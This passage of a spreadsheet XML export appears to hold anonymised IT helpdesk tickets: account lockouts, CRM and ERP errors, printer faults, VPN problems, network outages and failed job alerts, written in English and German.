    <s v="_x000d__x000a__x000d__x000a_received from: zmkitbsh.bxsyaipz@gmail.com_x000d__x000a__x000d__x000a_dear it helper,_x000d__x000a__x000d__x000a_please see below message. when i am trying to process on this complaint 7611183861, it didn't allow me to change anything, it says this crm is being processed by user sundj, and i am sundj. would you please help me to fix it? i have reboot my computer, but this message is still there._x000d__x000a__x000d__x000a__x000d__x000a_[cid:image001.png@01d20a16.847d2d00]_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="zmkitbsh bxsyaipz"/>
    <x v="14"/>
  </r>
  <r>
    <s v="problem with crm"/>
    <s v="_x000a__x000a_received from: vkzwafuh.tcjnuswg@gmail.com_x000a__x000a_hi,_x000a_when i signed into crm i got and error message. the reporting_engineering_tool didn't load. see below._x000a__x000a_[cid:image001.jpg@01d209a9.900c3d90]_x000a__x000a_vkzwafuh tcjnuswg - cmp_x000a_sr. application eng._x000a_vkzwafuh.tcjnuswg@gmail.com_x000a_"/>
    <s v="vkzwafuh tcjnuswg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="error when trying to access SID_1 quality system in erp."/>
    <s v="error when trying to access SID_1 quality system in erp."/>
    <s v="zirsbqca ohxsweji"/>
    <x v="0"/>
  </r>
  <r>
    <s v="u drive access"/>
    <s v="hello, for the next one month i will be in bedord, usa. i request to provide access to u drive (\\ldbsm010\engineering_application\) since its taking up too much time to open nx documents from engineering tool with the current u drive path (\\HostName_96\engineering_application). kindly process aerp. "/>
    <s v="pyamiwvx terscahn"/>
    <x v="11"/>
  </r>
  <r>
    <s v="lizenz "/>
    <s v="let's talk- video kann nicht geÃ¶ffnet werden"/>
    <s v="lfaqrivo bmitazrx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="usa nc server HostName_1326 is not responding, no access"/>
    <s v="usa nc server HostName_1326 is not responding, no access"/>
    <s v="qedxiryu mdupjolb"/>
    <x v="11"/>
  </r>
  <r>
    <s v="employee owned mobility agreement"/>
    <s v="_x000d__x000a__x000d__x000a_received from: rmzlvqjf.eaqyxljb@gmail.com_x000d__x000a__x000d__x000a_hello help team,_x000d__x000a_attached you will find the agreement. what do i need to do next to get e-mail push, calendar synchronization etc.?_x000d__x000a__x000d__x000a_mit freundlichem gruÃŸ / best "/>
    <s v="rmzlvqjf eaqyxljb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="sync hr org details to purchasing"/>
    <s v="sync hr org details to purchasing for dhmfuvgw jralkfcb (hufghygh).  he is getting the following error: _x000a_no data found for employee '1111196977', inform system administration."/>
    <s v="mpihysnw wrctgoan"/>
    <x v="29"/>
  </r>
  <r>
    <s v="account locked out"/>
    <s v="account locked out"/>
    <s v="ikgrtwhz tmqdiwge"/>
    <x v="0"/>
  </r>
  <r>
    <s v="duplicate machines displaying in machine list"/>
    <s v="when a work center is changed on a machine in erp pm the machine with the old and new work center appear in the machine list in mii"/>
    <s v="entuakhp xrnhtdmk"/>
    <x v="40"/>
  </r>
  <r>
    <s v="skype audio not working"/>
    <s v="_x000d__x000a__x000d__x000a_received from: vkezwolt.fgnqzeai@gmail.com_x000d__x000a__x000d__x000a_kind attn:_x000d__x000a__x000d__x000a_kindly resolve subject issue at the earliest._x000d__x000a__x000d__x000a_best "/>
    <s v="vkezwolt fgnqzeai"/>
    <x v="0"/>
  </r>
  <r>
    <s v="drucker ng15 funktioniert nicht mehr (hardware problem), dringend benÃ¶tigt fÃ¼r auftragspapiere und bestellunge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hp laserjet 600_x000d__x000a_ _x000d__x000a_   â€¢  detailed description of the problem ? papier staut sich, es kommt kein ausdruck raus_x000d__x000a__x000d__x000a_   â€¢  type of documents not printing?  (email â€“ excel â€“ wordâ€¦etc) erp_x000d__x000a_      (inwarehouse_tool â€“ delivery note â€“ production orderâ€¦etc)_x000d__x000a__x000d__x000a_   â€¢  what system or application being used at time of the problem?      (ex windows / erp /kls)_x000d__x000a__x000d__x000a_   â€¢  if not printing at all, does it respond to a ping command on the network and has a power cycle of the printer been completed?_x000d__x000a__x000d__x000a_   â€¢  if erp system, which system?   (ex SID_34 / SID_38 / hrp / plm) SID_34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ogasxnpw cfvqrhap"/>
    <x v="32"/>
  </r>
  <r>
    <s v="problem in engineering tool"/>
    <s v="_x000d__x000a__x000d__x000a_received from: zaeduhlt.jdgsamtv@gmail.com_x000d__x000a__x000d__x000a_hallo,_x000d__x000a__x000d__x000a_ich habe ein problem beim Ã¼bertragen eines berirtchts in das engineering tool system._x000d__x000a__x000d__x000a_siehe das gelbe feld unten._x000d__x000a_schon mehrere male habe ich die felder ausgefÃ¼llt und gespeichert._x000d__x000a__x000d__x000a_wenn ich den berirtcht in das system Ã¼bertagen mÃ¶chte, gibt es eine fehlermeldung:_x000d__x000a__x000d__x000a_siehe anhang_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_[cid:image001.png@01d209bf.4ac78940]_x000d__x000a__x000d__x000a_mit freundlichen grÃ¼ÃŸen / with best "/>
    <s v="zaeduhlt jdgsamtv"/>
    <x v="25"/>
  </r>
  <r>
    <s v="blank call"/>
    <s v="blank call from germany - interaction id - 2064209888"/>
    <s v="fdmaluyo tvecikxn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="2md extenral monitor will not stay one, it flashes briefly then goes out."/>
    <s v="2md extenral monitor will not stay one, it flashes briefly then goes out."/>
    <s v="wvtsiucg bfpemgol"/>
    <x v="2"/>
  </r>
  <r>
    <s v="travel expenses in erp"/>
    <s v="_x000a__x000a_received from: uyrpdvoq.mbzevtcx@gmail.com_x000a__x000a_hi_x000a__x000a_i get this information when i want to do my travel expenses_x000a__x000a_zero amount_x000a__x000a_[cid:image002.png@01d209d4.05d99cf0]_x000a__x000a__x000a_but i entered the numbers as below_x000a__x000a_[cid:image003.png@01d209d4.05d99cf0]_x000a__x000a__x000a__x000a_[cid:image004.png@01d209d4.05d99cf0]_x000a__x000a__x000a__x000a__x000a_uyrpdvoq mbzevtcx_x000a_sales manager earthworks european served area â€“ north_x000a__x000a_uyrpdvoq.mbzevtcx@gmail.com&lt;mailto:uyrpdvoq.mbzevtcx@gmail.com&gt;_x000a_company infrastructure gmbh_x000a_geschÃ¤ftsfÃ¼hrer: phvkowml azbtkqwx und naruedlk mpvhakdq_x000a__x000a_www.company.com&lt;_x000a__x000a__x000a_"/>
    <s v="uyrpdvoq mbzevtcx"/>
    <x v="9"/>
  </r>
  <r>
    <s v="telephony_software interaction desktop fails to connect"/>
    <s v="this seems to have started after windows update kb4283716 got installed on user's pc._x000d__x000a_please find screenshot in the attached email."/>
    <s v="urvitans laqdwvgo"/>
    <x v="65"/>
  </r>
  <r>
    <s v="please check the ale in detail, we have ongoing issues with sending data from hrp to SID_34 and SID_39 - assign to sreedhar"/>
    <s v="please have a close look on the ale interface in production environment, i did work through some requests about expense reporting issues and i found out, that many changes in hrp did not move to SID_34 via ale, even when the data was fine on hr side. for example the changes in it around stefyty and tom were not reflected in SID_34, it looks like the majority of changes since at least 2 or 3 months were not synced. i'm not sure, if nothing went over, some did, but could be because of manual runs of ale by the hris team."/>
    <s v="pesylifc wnyierbu"/>
    <x v="20"/>
  </r>
  <r>
    <s v="drucker hp laserjet 3525 (mp 72) defekt"/>
    <s v="hp drucker cp3525 defekt, wurde bereits ausgetauscht (hp laserjet 500)"/>
    <s v="xfznctqa xstndbwa"/>
    <x v="32"/>
  </r>
  <r>
    <s v="reset passwords for davidthd robankm using password_management_tool password reset."/>
    <s v="the"/>
    <s v="zelunfcq yimdwjrp"/>
    <x v="16"/>
  </r>
  <r>
    <s v="rechner fÃ¼r messvorrichtung steli funktioniert nicht \jionmpsf wnkpzcmv"/>
    <s v="rechner fÃ¼r messvorrichtung steli funktioniert nicht \jionmpsf wnkpzcmv"/>
    <s v="jionmpsf wnkpzcmv"/>
    <x v="24"/>
  </r>
  <r>
    <s v="barcode scanner defekt \paternoster \bur am orde"/>
    <s v="barcode scanner defekt \paternoster \bur am orde"/>
    <s v="xwirzvda okhyipgr"/>
    <x v="24"/>
  </r>
  <r>
    <s v="usb verlÃ¤ngerungskabel liefern .\hxwtidja ixahzmvf"/>
    <s v="usb verlÃ¤ngerungskabel liefern .\hxwtidja ixahzmvf"/>
    <s v="hxwtidja ixahzmvf"/>
    <x v="24"/>
  </r>
  <r>
    <s v="rechner nach update startet nicht \ewew8323649 \cudgevmx waqslrbd"/>
    <s v="rechner nach update startet nicht \ewew8323649 \cudgevmx waqslrbd"/>
    <s v="cudgevmx waqslrbd"/>
    <x v="24"/>
  </r>
  <r>
    <s v="iehs metrics input - unable to scroll (urgent please)"/>
    <s v="_x000d__x000a__x000d__x000a_received from: fniqhjtg.qrfuetpw@gmail.com_x000d__x000a__x000d__x000a_good day,_x000d__x000a__x000d__x000a_please can you advise how i can scroll down this screen â€“ (i have to minimize it in order to view all my entries) not sure what i am doing wrong._x000d__x000a_please help_x000d__x000a__x000d__x000a_[cid:image002.png@01d209ca.c93911d0][cid:image003.jpg@01d209ca.c93911d0]_x000d__x000a__x000d__x000a_[cid:image004.jpg@01d209ca.c93911d0]_x000d__x000a__x000d__x000a_best "/>
    <s v="fniqhjtg qrfuetpw"/>
    <x v="33"/>
  </r>
  <r>
    <s v="reset passwords for cubdsrml znewqgop using password_management_tool password reset."/>
    <s v="the"/>
    <s v="cubdsrml znewqgop"/>
    <x v="16"/>
  </r>
  <r>
    <s v="kein rechnungseingang beim kunden per e-mail "/>
    <s v="kunde 81125605 / cc5202 erhÃ¤lt unsere rechnungen per e-mail - rechnungsempfÃ¤nger 81151242 / cc5202 - empfangende e-mail adresse rechnungseingang@sew-eurodrive.de bis zum 01.08.16 hat der kunde problemlos die rechnungen erhalten. ab dem 02.08.16 nicht mehr. dem kunden liegen die rechnungen somit nicht vor und werden deshalb auch nicht bezahlt. ich kann keine Ã¤nderung feststellen  und bitte deshalb um klÃ¤rung. danke. _x000d__x000a__x000d__x000a__x000d__x000a_translation : _x000d__x000a_customer 81125605 / cc5202 receive our inwarehouse_tools by email - inwarehouse_tool recipient 70,040,131 / cc5202 - receiving email address rechnungseingang@sew-eurodrive.de until 01:08:16 the customer easily get the bills. from 02:08:16 not. the customer therefore not be before the bills and are therefore not paid. i can not detect any change and therefore ask for clarification. "/>
    <s v="hgufmidr mfobkyun"/>
    <x v="12"/>
  </r>
  <r>
    <s v="we've been informed that company malaysia office faced the problem of internet access, please help check and confirm"/>
    <s v="do the needful on below e-mail request._x000d__x000a__x000d__x000a_"/>
    <s v="tqfnalpj qyoscnge"/>
    <x v="3"/>
  </r>
  <r>
    <s v="open tickets - gÃ¼nter steinhÃ¤uÃŸer "/>
    <s v="_x000d__x000a__x000d__x000a_received from: rtnzvplq.erhmuncq@gmail.com_x000d__x000a__x000d__x000a_need support for one of our team member â€“ gÃ¼ter steinhÃ¤usser, location germany;_x000d__x000a__x000d__x000a_he already opened already more tickets to get his skype up to speed â€“ but he mentioned that is not solved out after two month;_x000d__x000a_gÃ¼nter has to participate on important hr calls â€“ so he should be able to work with our common communication technology;_x000d__x000a__x000d__x000a_please support and follow up with gÃ¼nter directly â€“ german language is necessary!_x000d__x000a__x000d__x000a_"/>
    <s v="rtnzvplq erhmuncq"/>
    <x v="26"/>
  </r>
  <r>
    <s v="fixed assets additions list"/>
    <s v="additions are not matching to trial balance and or  to settlement list. difference is mainly cwip of the last year settled in the current year."/>
    <s v="miecoszw mhvbnodw"/>
    <x v="9"/>
  </r>
  <r>
    <s v="my powerpoint application crashed everytime after starting a file - impossible to work"/>
    <s v="my powerpoint application crashed everytime after starting a file - impossible to work_x000d__x000a__x000d__x000a_need to work on a customer proposal and on internal presentations_x000d__x000a__x000d__x000a_no matheywter what pptx file i open the application crashes immediateley and  i need to restart the computer. _x000d__x000a__x000d__x000a__x000d__x000a_it is absolutely impossible to work with powerpoint on my laptop at present_x000d__x000a__x000d__x000a_i am in transit home from businesstrip - you can reach me as of 14:00 german time"/>
    <s v="jcmxerol nbfyczqr"/>
    <x v="18"/>
  </r>
  <r>
    <s v="netweaver business client 5.0"/>
    <s v="_x000d__x000a__x000d__x000a_received from: jfsmwpny.klxsdqiw@gmail.com_x000d__x000a__x000d__x000a_hello colleagues ,_x000d__x000a__x000d__x000a_need your help._x000d__x000a_today i will start , my &quot;netweaver business client 5.0&quot; for start a &quot;er&quot; but unfortunately the &quot;netweaver business client 5.0&quot; is not working._x000d__x000a_"/>
    <s v="jfsmwpny klxsdqiw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset passwords for davidthd robankm using password_management_tool password reset."/>
    <s v="the"/>
    <s v="zelunfcq yimdwjrp"/>
    <x v="16"/>
  </r>
  <r>
    <s v="probleme mit laser"/>
    <s v="der pc (ganz alter pc) am halbautomaten schaltet sich anscheinend wg. hitze ab._x000d__x000a_lÃ¼fter vom netzteil dreht nicht !_x000d__x000a__x000d__x000a_"/>
    <s v="sgnubadl gpkovbah"/>
    <x v="24"/>
  </r>
  <r>
    <s v="need help in adding users in au-accounts.receivable@company.com"/>
    <s v="need help in adding users in au-accounts.receivable@company.com"/>
    <s v="urwqxgdp twepkmis"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to create delivery"/>
    <s v="please provide the following:_x000d__x000a__x000d__x000a_what order number?  5019103263_x000d__x000a__x000d__x000a_what material or item number? 7352179_x000d__x000a__x000d__x000a_what warehouse location? from plant_228 to plant_244_x000d__x000a__x000d__x000a_issue description / error message? no sto possible with these combinations"/>
    <s v="zcokibmd xnrthsmj"/>
    <x v="29"/>
  </r>
  <r>
    <s v="fc fÃ¼r departments\skv-alicona"/>
    <s v="hallo marfhtyio._x000a_mit dem freischalten von srgtycha geht klar._x000a_wÃ¼rdest du bitte den hr. bxgwyamr hjbukvcq personalnr. 10056553_x000a_und den hr. wjzvabrl bmcfrlyz personalnr. 10560825_x000a_ebenfalls freischalten._x000a_danke im voraus._x000a__x000a__x000a_mfg. reinhard_x000a__x000a_von: yevirgnl ylhogjct _x000a_gesendet: mittwoch, 7. september 2016 09:04_x000a_an: ypladjeu wzfryxav_x000a_cc: hqyfebtd pkmyrdga_x000a_betreff: wg: zugriffsrechte_x000a__x000a_hallo reinhard,_x000a__x000a_ich bitte um ein approval (ok) fÃ¼r den zugriff._x000a__x000a_gruss_x000a_marfhtyio_x000a__x000a_mit freundlichen grÃ¼ssen / best "/>
    <s v="ypladjeu wzfryxav"/>
    <x v="11"/>
  </r>
  <r>
    <s v="issue with the difference amount in the po approval report : zpsr0001 and also kindly remove the programdnty : zpsu0002"/>
    <s v="issue with the difference amount in the po approval report : zpsr0001 and also kindly remove the programdnty : zpsu0002 as this is no longer used."/>
    <s v="mnrgpfqh mblavfti"/>
    <x v="20"/>
  </r>
  <r>
    <s v="fc auf departments\_scan\we47"/>
    <s v="guten morgen,_x000d__x000a__x000d__x000a_bitte die schreib / leseberechtigung  fÃ¼r ordner m:_scan\we47 einrichten._x000d__x000a__x000d__x000a_danke_x000d__x000a__x000d__x000a__x000d__x000a_ _x000d__x000a__x000d__x000a_freundliche grÃ¼ÃŸe / kind "/>
    <s v="htvepyua izgulrcf"/>
    <x v="11"/>
  </r>
  <r>
    <s v="unable to sign in to skype"/>
    <s v="confirmed email address was typed into the userid field. as system was away from the phone called back on mobile: _x000a_pavan confirmed issue was resolved."/>
    <s v="euyhszrn ktmhjnzp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="msd crm still no synchronize with erp"/>
    <s v="still no synchronize with erp after repair to zip code see  ticket_no1530289._x000d__x000a__x000d__x000a_still showing an error see attached file. the zip code is now correct._x000d__x000a__x000d__x000a_for all user company in israel."/>
    <s v="wqfzjycu omleknjd"/>
    <x v="39"/>
  </r>
  <r>
    <s v="question on how to login to impact awards"/>
    <s v="to login to impact awards: "/>
    <s v="dwflzqyn uinpgbym"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account unlock - lichtyuiwu7"/>
    <s v="markhty leibdrty called to have the account unlocked. unlocked, confirmed he was able to login."/>
    <s v="fdmaluyo tvecikxn"/>
    <x v="33"/>
  </r>
  <r>
    <s v="no erp and netweaver enterence_please help aerp. "/>
    <s v="_x000d__x000a__x000d__x000a_received from: chbvyjqr.dqbwijvy@gmail.com_x000d__x000a__x000d__x000a_colleagues, i can't enter to this programdntys, i need it immediately. please help aerp._x000d__x000a__x000d__x000a_please see below:_x000d__x000a__x000d__x000a_[cid:image001.png@01d209b3.957897b0]_x000d__x000a__x000d__x000a__x000d__x000a_[cid:image002.png@01d209b3.957897b0]_x000d__x000a__x000d__x000a_best "/>
    <s v="chbvyjqr dqbwijvy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ferbfhyunam is not able to connect with telephony_software interaction desktop"/>
    <s v="error message:  unable to log on for the following reason: 0 bytes read from network stream._x000a_user: ferbfhyunam_x000a_workstation: ekmw8111163_x000a_see attached picture,"/>
    <s v="xgpqsihu xcswovzi"/>
    <x v="32"/>
  </r>
  <r>
    <s v="erp net weaver doesnt work, error message: microsoft. net framdntyework 4.5 is not installed."/>
    <s v="erp net weaver doesnt work, error message: microsoft. net framdntyework 4.5 is not installed."/>
    <s v="xjazwpmd sjirdnam"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account locked in ad"/>
    <s v="account locked in ad"/>
    <s v="xbgwfmvj oemxazyl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="business_client - log on error - "/>
    <s v="business_client logon is not working and throwing error .. seems issue with my laptop and logon is working fine when tried in other system_x000d__x000a__x000d__x000a_"/>
    <s v="acwoflmg lvwmshcr"/>
    <x v="18"/>
  </r>
  <r>
    <s v="power outage: south amerirtca: site hard down since at 01:23 am et on 08/09. no backup circuit."/>
    <s v="what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ___yes______     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ________01:23 am et on 08/09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na______     (yes/no/na) _x000d__x000a__x000d__x000a_11. vendor ticket  # ( global_telecom_1, verizon, telecom_vendor_1, telecom_vendor_2 )    _______  global_telecom_1#332645226__________________       _x000d__x000a__x000d__x000a_12. notified  gsc  ___yes_____     (yes/no/na)    cert started  ?________    (yes/no/na) _x000d__x000a__x000d__x000a_13.  additional diagnostics"/>
    <s v="mnlazfsr mtqrkhnx"/>
    <x v="7"/>
  </r>
  <r>
    <s v="skype is not working "/>
    <s v="skype is not working "/>
    <s v="zrcfyiea gynbmopr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="we need for all participants an access for the guest  wifi system in-house. (see the attached excel spread sheet) 13.-14"/>
    <s v="from: ylqvitsk bfnackrw _x000d__x000a_sent: wednesday, september 07, 2016 4:45 pm_x000d__x000a_to: nwfodmhc exurcwkm_x000d__x000a_subject: rakthyesh wg: cost center_x000d__x000a_importance: high_x000d__x000a__x000d__x000a_hello, _x000d__x000a__x000d__x000a_we need for all participants an access for the guest  wifi system in-house. (see the attached excel spread sheet)_x000d__x000a_13.-14. sept 2016 _x000d__x000a__x000d__x000a_time for access: 2 days  _x000d__x000a_location: company fÃ¼rth germany (room-7)_x000d__x000a_event: &quot;technical training metal cutting&quot; _x000d__x000a__x000d__x000a_the different names you will find in the attached excel-list _x000d__x000a__x000d__x000a_"/>
    <s v="ylqvitsk bfnackrw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="action required: please connect to the new vpn url before january 30"/>
    <s v="from: vivbhuek kanjdye _x000a_sent: thursday, september 08, 2016 9:45 am_x000a_to: nwfodmhc exurcwkm_x000a_subject: re: action required: please connect to the new vpn url before january 30_x000a__x000a_hi_x000a_we are getting following message_x000a__x000a_system warnings_x000a_  clear system warnings &gt;&gt;_x000a__x000a_  no javascript is installed_x000a__x000a_warning: for full functionality, enable javascript in your browser. otherwise, some features, especially those related to web applications in new windows, may not work correctly. _x000a_  cache cleaner is failed_x000a__x000a_warning: popup blockers can cause the cache cleaner to fail. if you use a popup blocker, you may see outdated pages and forms. for best functionality, disable your popup blocker. _x000a_  policy restriction_x000a__x000a_access to network access resource company vpn has been denied by the policy engine._x000a_the reason is:_x000a_â€¢  no anti-virus or anti-virus is not trusted _x000a__x000a__x000a_"/>
    <s v="zfliqpxm dgfvaqlh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="cplant_2404 depreciation  issue"/>
    <s v="_x000a__x000a_received from: bujiesrg.zopcrshl@gmail.com_x000a__x000a_dear ,_x000a__x000a_i find a gap between fs10n report and asset balance report (s_alr_98122075) in 5319_x000a__x000a__x000a_for cplant_2404 cost center , we only add two rrc asset in jul, so the depreciation should be 16,922.2 rmb( 8,461.01+8,461.01=16,922.2) increase in aug._x000a_but when i run fs10n find the depreciation only add 7,012.55rmb (60,195.23-53,182.68=7,012.55)_x000a_can you give me some idea about this?"/>
    <s v="bujiesrg zopcrshl"/>
    <x v="9"/>
  </r>
  <r>
    <s v="hsh"/>
    <s v="_x000a__x000a_received from: aksthyuhath.shettythruy@company.com_x000a__x000a_hi,_x000a__x000a_mr. hatryupsfshytd user id locked. please reset the password and send the new password to his manager mr. panghyiraj shthuihog &lt;ebkfwhgt.flapokym@gmail.com&gt;_x000a__x000a__x000a_emp no_x000a__x000a_name_x000a__x000a_useid_x000a__x000a_manager_x000a__x000a_200746709_x000a__x000a_aqihfoly xsrkthvf_x000a__x000a_hsh_x000a__x000a_panghyiraj shthuihog_x000a__x000a__x000a__x000a_fyi._x000a__x000a_[cid:image001.png@01d209b2.81cadcb0]_x000a__x000a_with "/>
    <s v="badnzyue nxuqmdwl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="è½¬å‘: è®¢å•å·ï¼š5212346451å¯ä»¥ç­¾å­—äº†"/>
    <s v="_x000d__x000a__x000d__x000a_received from: apacjun.zhang@company.com_x000d__x000a__x000d__x000a_hello alex_x000d__x000a_è¿™ä¸ªå¯ä»¥å¼€ç¥¨äº†ï¼Œå¤šè°¢ï¼_x000d__x000a__x000d__x000a_best "/>
    <s v="qzbxfncr kysuqema"/>
    <x v="29"/>
  </r>
  <r>
    <s v="can not login in erp SID_1 for uacyltoe hxgayczeing"/>
    <s v="attached the screen shot for the error information."/>
    <s v="qnvkwalx dfjtxigl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="circuit  outage: primary circuit company-eu-deu-koenigsee-mpls-2911-rtr01.company.com is down since 6:35 pm et"/>
    <s v="what type of outage:  _____network     ___x__circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ___no______     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ______ 6:35 pm et on 9/7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x v="7"/>
  </r>
  <r>
    <s v="node down - on   lhqsm68267 "/>
    <s v="node down - on   lhqsm68267 "/>
    <s v="jyoqwxhz clhxsoqy"/>
    <x v="7"/>
  </r>
  <r>
    <s v="erp access "/>
    <s v="_x000a__x000a_received from: idkfgcnq.vjwhmzor@gmail.com_x000a__x000a_good afternoon,_x000a__x000a_can you please unlock my username for erp. i have been locked for too many log in attempts._x000a__x000a_vyjmlain hvjbmdgi_x000a_senior technical service rep_x000a_inside-sales@company.com&lt;mailto:inside-sales@company.com&gt;_x000a__x000a__x000a__x000a__x000a_"/>
    <s v="idkfgcnq vjwhmzor"/>
    <x v="0"/>
  </r>
  <r>
    <s v="it request"/>
    <s v="_x000d__x000a__x000d__x000a_received from: otmpauyr.ijztksal@gmail.com_x000d__x000a__x000d__x000a_hello._x000d__x000a_my supervisor (ybuvlkjq nwcobvpl) has asked me to send an it request.  i am able access documents in some folders on our h drive, but not all.  i would like permission to access documents that are located in the quality control folder located at h:\quality control._x000d__x000a_"/>
    <s v="otmpauyr ijztksal"/>
    <x v="0"/>
  </r>
  <r>
    <s v="telephony_software phone issue"/>
    <s v="_x000d__x000a__x000d__x000a_received from: tjlgzkbp.iervwjzg@gmail.com_x000d__x000a__x000d__x000a_hello it,_x000d__x000a__x000d__x000a_yesterday i had the telephony_software phone and system update done._x000d__x000a_today, i notice that it shows a 'yellow' phone icon showing that i am on the phone but i am not._x000d__x000a_i am not receiving calls._x000d__x000a_can you please assist quickly._x000d__x000a_"/>
    <s v="tjlgzkbp iervwjzg"/>
    <x v="6"/>
  </r>
  <r>
    <s v="job Job_2063d failed in job_scheduler at: 09/07/2016 16:16:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2063d failed in job_scheduler at: 09/07/2016 16:16:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="uninstall google chrome"/>
    <s v="uninstall google chrome"/>
    <s v="vfsjoquc razepdqb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job SID_38filesys failed in job_scheduler at: 09/07/2016 15:36:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_38filesys failed in job_scheduler at: 09/07/2016 15:36:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="70124272 customer erp #  no longer available in crm to create new opportstorage_product"/>
    <s v="i have 4 closed won opportunities for this customer and 3 active open opportunities for this customer.  tried to create another opportstorage_product for this customer and they are no longer on my list of available customers.  when i try to put their name in the account/end user name field i get the statement &quot;no records found&quot;  tried several other customers and they work, just not this one._x000d__x000a_"/>
    <s v="awpcmsey ctdiuqwe"/>
    <x v="39"/>
  </r>
  <r>
    <s v="blank call gso // loud noise"/>
    <s v="blank call gso // loud noise"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to connect to network drives on vpn"/>
    <s v="unable to connect to network drives on vpn"/>
    <s v="lijrvdgh wfhmdsoa"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account locked out"/>
    <s v="account locked out"/>
    <s v="qfcxbpht oiykfzlr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account locked on vpn page"/>
    <s v="account locked on vpn page"/>
    <s v="vxzahrlc frtkpehy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="company email password not working"/>
    <s v="company email password not working"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account locked out"/>
    <s v="account locked out"/>
    <s v="koiapqbg teyldpkw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vip 2 // SID_60 hana login"/>
    <s v="name:stdezpqw bkmeuhfz_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:stdezpqw.bkmeuhfz@gmail.com_x000a_customer number:_x000a_telephone:=_x000a_summary:need access to erp hana SID_60"/>
    <s v="stdezpqw bkmeuhfz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ie issue"/>
    <s v="ie issue"/>
    <s v="zfburidj jmilguev"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset the password for iwtvrhnz rxiumhfk on erp / production / erp"/>
    <s v="reset the password for iwtvrhnz rxiumhfk on erp / production / erp"/>
    <s v="iwtvrhnz rxiumhfk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on inplant_857988"/>
    <s v="ticket update on inplant_857988"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to collaboration_platform"/>
    <s v="unable to login to collaboration_platform"/>
    <s v="pqizlhkx adbyhglu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="please send expense report 2111137753 to qmglkaru qiwhfkdv for approval"/>
    <s v="please manually send expense report 2111137753 to qmglkaru qiwhfkdv for approval, its stuck w/ pathuick thgheijmer due to reporting relationship changes. "/>
    <s v="siqobhlz vwljuize"/>
    <x v="9"/>
  </r>
  <r>
    <s v="connection issue"/>
    <s v="_x000d__x000a__x000d__x000a_received from: riqmdnzs.mtlghwex@gmail.com_x000d__x000a__x000d__x000a_dear team,_x000d__x000a__x000d__x000a_please help to raise a ticket with network team as the user slkxgzdj wxpytevu working remotely in erp systems and he keep getting kicked out without able to continue his work_x000d__x000a__x000d__x000a_"/>
    <s v="riqmdnzs mtlghwex"/>
    <x v="19"/>
  </r>
  <r>
    <s v="HostName_1201 plm server"/>
    <s v="just to let someone now that the dsccache service isn't running on HostName_1201"/>
    <s v="ctvaejbo mjcerqwo"/>
    <x v="11"/>
  </r>
  <r>
    <s v="unable to connect to dv28, dv06, and dv40"/>
    <s v="unable to connect to dv28, dv06, and dv40"/>
    <s v="iwtvrhnz rxiumhfk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unknown emails from miltgntyuon knighdjhtyt"/>
    <s v="_x000d__x000a__x000d__x000a_received from: zxobmreq.udikorhv@gmail.com_x000d__x000a__x000d__x000a_i was going to forward 2 emails i received, but it gives me an alert message â€“ see attachments.  if you need to connect with my terminal let me know.  i moved them both to my delete box._x000d__x000a_"/>
    <s v="zxobmreq udikorhv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account locked out, need to unlock"/>
    <s v="account locked out, need to unlock"/>
    <s v="ntsowaem jfgslyde"/>
    <x v="0"/>
  </r>
  <r>
    <s v="circuit outage : apac - china vpn circuit is down at 12:41 pm et on 09/07. site is up on mpls."/>
    <s v="what type of outage:  _____network     __x___circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____yes_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ________12:41 pm et on 09/07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_na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3"/>
  </r>
  <r>
    <s v="install analysis office 2.2 sp 03 in clrgtydia's pc since office version is 2016"/>
